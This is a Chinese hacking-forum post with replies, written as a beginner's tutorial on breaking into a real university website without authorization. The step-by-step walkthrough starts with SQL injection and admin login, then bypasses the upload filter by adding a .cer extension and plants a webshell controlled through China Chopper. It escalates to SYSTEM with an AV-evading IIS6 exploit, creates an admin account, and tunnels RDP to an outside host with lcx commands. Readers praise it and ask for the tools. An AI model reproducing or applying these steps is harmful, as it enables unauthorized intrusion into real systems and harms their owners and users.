提权某省理工大学分站学院

先看看主页,恩   马赛克打得够漂亮~~
    首先是注入点,这个站安全做的太差了,随便找篇新闻,就有注入点。
    注入得到用户名密码 md5解密。这个就不细说了,新手也都会。今天主要说拿shell和提权。

用注入到的密码进后台,后台地址Admin_Login.asp, 很好找。。。  顺便一提页面右下角就有。根本不用找。

这里验证码没显示出来,不用担心。随便输入就可以。

进入后台,先找找上传吧,这个后台看起来权限比较多,应该很容易拿shell。

添加文章那里上传图片格式有限制,那我们再找找,总有比较方面的办法。
    经过一番寻找,找到了网站配置信息。这里可以添加上传格式
    我添加了个asp, 去添加文章上传一下试试,还是不行。

然后我又在配置信息里添加了aaspsp,还是不行。  那咱们就试试cer吧。 添加个cer格式。然后把本地的小马后缀也改成cer。再次上传。成功。
    其实除了cer  还有一些格式也可以试试,比如ashx  这么多格式 总有一款适合你。
    好了 我们用小马添加个大马。还有一句话。
    然后用菜刀连接。   连接成功。

下面说提权。(其实这个站我以前来过,为了写个原创帖子,我又进去一次。)
    先用菜刀查看一下权限吧。 执行whoami。
    显示 拒绝访问。 不用担心,因为我用大马查看了一下, Wscript.Shell 这个组件是支持的。
    可能是目录问题。那么我们就自己上传个cmd.exe,到一个可读可写的目录去。
    一般情况下这个目录都是可以的 C:\RECYCLER\   好的  菜刀上传一个cmd到这个目录去。

上传成功,  然后我们修改一下菜刀虚拟终端的位置  就可以执行cmd了。看我操作
    首先输入SETP C:\RECYCLER\cmd.exe  将菜刀执行的文件换成你上传的cmd路径,注意中间的空格。
    然后再查看一下是否成功。输入whoami。   OK   现在已经不再拒绝访问了。

当然  现在这个权限是不足以创建用户的。

这就需要我们先上传一个对应系统的iis.exe。   我之前查看了一下这个服务器的系统,是IIS6.0 那我们就传iis6用的iis.exe
    因为这个系统有主动防御。 所以最好传免杀的。
    传上去之后呢。我们使用一下。  iis.exe的使用方法也很简单。看操作
    只需在cmd下输入iis的路径和命令 格式如下
    C:\RECYCLER\iis.exe “要执行的cmd命令”   注意双引号和空格。

我电脑卡了,  这个部分就没办法截图了。  反正就是这样执行,我就成功了。
    C:\RECYCLER\iis.exe "whoami"显示的是system权限。
    然后C:\RECYCLER\iis.exe "添加用户的命令"
    成功添加一个用户为管理员。

好吧,接下来就是比较揪心的时候了。
    有了用户,那么远程连接一下吧。
    我们用大马查询一下对面注册表,看看远程端口是多少。用注册表查平时很好用。
    上面显示的是3389,  我去连接。 连接不上。
    在这上面我花了一些时间,最后才发现,注册表显示是错误的。 实际的是3390。

我是用cmd查出3390的。
    具体怎么查呢,请看下面步骤。
    cmd输入 tasklist /svc   查看服务。 找到TermService 服务 记下他的PID

然后再cmd输入 netstat -ano  查看所有端口。找到与刚才PID一样的端口。
    3390  就是他了。
    然后我连接远程桌面3390端口,  连接不上。 这里呢  我判断他应该是内网。
    那么  我们用lcx转发一下试试。
    上次有人说不会lcx,  那么这次我就说详细一点吧。
    需要 cmd和lcx 放在同一个目录下。本地一份,上传到服务器一份。
    那么 仅仅几条命令就可以完成转发了。
    请记清楚端口。
    首先。本地监听命令
    lcx -listen 2222 3333
    这两个端口可以自己更改,但一定要没有被占用的。 如果这里更改端口,服务器上的命令端口也要更改,只需更改2222即可。

然后我们在服务器上运行发送命令
    可以用菜刀执行。
    命令如下
    lcx -slave 123.123.123.123 2222 127.0.0.1 3389
    图片里面的是3390,因为这个是我这台服务器的远程端口,默认的应该是3389
    回车即可, 。转发期间,不能关闭cmd窗口。切记。

这样就lcx转发完成了,我们之间连接远程桌面。127.0.0.1:3333   
    连接的时候,刚才打开的cmd窗口会有数据传输,这是正常现象。
    然后就可以登录桌面了。
    登录成功。

至此  本次渗透彻底结束。      希望大学网站注意安全。

不挂黑页,不留痕迹。
    轻轻地来,又轻轻地走。
    我挥一挥衣袖,不带走一片云彩。

还有就是。。。。。。。   服务器里面这么多AV 、种子、游戏。
    光是A片就有一百多G。。。。

你们感受一下吧。

网站管理员,服务器内存都让你吃了~~~~

最后说一句,为了让新手看得懂,这篇文我写了好久,天很冷,冻得手都麻了。版主给加点分哦。

by  夜鸥

评分

a197110 + 2 露出网站地址了 8 9 11 自己看哦.
    随风淡笑 + 2 留图不留种!
    小雨 + 2 发图不发种子差评
    1142099496 + 6 打的好码
    kellen + 10 这教程写得好..通谷易懂..一看就明白.
    Free_小东 + 28 科普贴
    BattleHeart + 6 权限问题只能给这么多~感谢你精彩的分享~.
    蓝色_ + 10 这个码打得有点技巧
    by无极 + 6 我就喜欢这马赛克
    契约 + 4 服务器里的资源,啧啧
    管理02 + 40 内容细节很明细
    90_ + 32 打得一手好码
    小志001 + 6 支持原创
    神仙 + 6 支持原创
    kali + 10 支持原创

无聊

太给力啦!

慵懒

给力的楼主,给你支持一个

LZ你好,马赛克打得不好,谷歌一下就搜索出来了

咳咳。。 不要说出来嘛。。。  详情 回复 发表于 2014-11-26 17:08

顺便求一下那个cmd.exe iis.exe 还有lcx.exe,我找好久都木有找到

cmd每个电脑上基本上都有。 lcx百度一抓一大把呢。  详情 回复 发表于 2014-11-26 17:03

我怎么感觉后面是重点

那是亮点。。。 彩蛋。  详情 回复 发表于 2014-11-26 17:02

犯贱1314 发表于 2014-11-26 16:11
    我怎么感觉后面是重点

那是亮点。。。   彩蛋。

testKai 发表于 2014-11-26 15:57
    顺便求一下那个cmd.exe iis.exe 还有lcx.exe,我找好久都木有找到

cmd每个电脑上基本上都有。   lcx百度一抓一大把呢。

testKai 发表于 2014-11-26 15:40
    LZ你好,马赛克打得不好,谷歌一下就搜索出来了

咳咳。。  不要说出来嘛。。。

开心

真的很给力啊  楼主能把服务器里的xx资源网盘吗